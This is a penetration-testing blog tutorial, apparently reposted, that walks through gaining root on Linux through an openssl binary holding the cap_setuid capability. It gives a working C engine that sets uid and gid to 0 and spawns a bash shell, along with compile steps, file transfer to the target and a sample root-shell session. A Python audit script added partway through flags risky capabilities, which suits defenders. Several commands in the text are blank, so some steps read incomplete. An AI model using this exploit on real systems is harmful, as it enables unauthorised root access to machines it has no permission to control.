How to: OpenSSL cap_setuid+ep PrivEsc Exploit

Privilege escalation to root user in 7 easy steps.

Privilege escalation to root using the cap_setuid capability on OpenSSL.

Consider a binary whose capabilities are set as: . Is there a way for a normal user to become root by using this?

YES! Let’s explore how.

0. Checklist: Will It Work For Me?

Search the capabilities of all binaries using: .

  • is the tool we will use
  • is the recursive flag
  • directs the standard error stream to

If you see , we are set for success.
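Added example, not code from the original post: the defender's side of this checklist. It parses the output of getcap -r (both the older "path = cap+ep" and the newer "path cap=ep" layouts), flags capabilities that let a binary change identity or bypass access control, and prints the setcap -r command that strips them. The risky-capability set and the sample lines are constructed for illustration.

```python
import re

# Capabilities that let a binary change its identity or bypass access control,
# so any code it can be made to load (e.g. an OpenSSL engine) runs as root.
# Illustrative set, an assumption of this example, not an exhaustive list.
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin"}

# Older getcap prints "PATH = cap_x+ep"; newer getcap prints "PATH cap_x=ep".
OLD_STYLE = re.compile(r"^(?P<path>\S+)\s*=\s*(?P<caps>.+)$")
NEW_STYLE = re.compile(r"^(?P<path>\S+)\s+(?P<caps>\S+=.*)$")
CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap_line(line):
    """Split one getcap line into (path, capability text); None if unparseable."""
    line = line.strip()
    m = OLD_STYLE.match(line) or NEW_STYLE.match(line)
    return (m.group("path"), m.group("caps")) if m else None


def audit(lines):
    """Return (path, capability, flags) for every risky capability in getcap -r output.
    flags: e = effective, p = permitted, i = inheritable."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for clause in caps.split():           # e.g. "cap_setuid,cap_setgid+ep"
            c = CLAUSE.match(clause)
            if not c:
                continue
            for name in c.group("names").split(","):
                if name in RISKY_CAPS:
                    findings.append((path, name, c.group("flags")))
    return findings


# Constructed sample covering both output formats (not taken from a real host).
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/usr/local/bin/netcap cap_net_bind_service,cap_net_admin=ep
/usr/local/bin/backup cap_dac_override=p
"""

if __name__ == "__main__":
    for path, cap, flags in audit(SAMPLE_GETCAP_OUTPUT.splitlines()):
        state = "effective" if "e" in flags else "permitted only"
        print(f"{path}: {cap} ({state}); remove with: setcap -r {path}")
```

Run it against real output with audit(subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout.splitlines()).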

1. Requirements (On Your System)

  1. We will use the header in our exploit engine file. On Debian-based systems, install it with: .
  2. gcc

2. Getting The Exploit Ready

Create a file named with contents as such:

#include <stdlib.h>          /* system() */
#include <unistd.h>          /* setuid(), setgid(); without this header gcc warns about implicit declarations */
#include <openssl/engine.h>

/* Called by OpenSSL when the engine is loaded; runs with the capabilities of the openssl binary. */
static int bind(ENGINE *e, const char *id)
{
    setuid(0); setgid(0);
    system("/bin/bash");
    return 1;                /* tell OpenSSL the engine bound successfully */
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

See reference [2] for more information.

3. Compiling

Run the following:

Output for 1:

┌──(kali㉿kali)-[/tmp]
└─$ gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
openssl-exploit-engine.c: In function ‘bind’:
openssl-exploit-engine.c:5:3: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
5 | setuid(0); setgid(0);
| ^~~~~~
openssl-exploit-engine.c:5:14: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
5 | setuid(0); setgid(0);
| ^~~~~~

These warnings appear only when setuid/setgid are used without including <unistd.h>; they are safe to ignore. The result is the file.

4. Transferring the file

Using 's HTTP server on your machine, and or on the target machine, we can transfer the file.

  1. [on your machine] start a python3 HTTP server in the directory containing the file, as such: . This starts the server on port 80.
  2. [on target machine] fetch the file with wget or curl, as such:

5. Root (Finally!)

Once you have the file, run the following from the directory containing the .so file.

Sample output

user@server:~$ openssl req -engine ./openssl-exploit-engine.so
root@server:~# whoami
root

Enjoy!

6. Common Errors

┌──(kali㉿kali)-[/tmp]
└─$ gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
openssl-exploit-engine.c:1:10: fatal error: openssl/engine.h: No such file or directory
1 | #include <openssl/engine.h>
| ^~~~~~~~~~~~~~~~~~
compilation terminated.

If you get this error, check the section on Requirements.

7. References

  1. Read up more on capabilities.
  2. OpenSSL building a useless engine
  3. How to use the library load feature OpenSSL

Originally published at https://chaudhary1337.github.io on June 17, 2021.

Breaking in Pen-Testing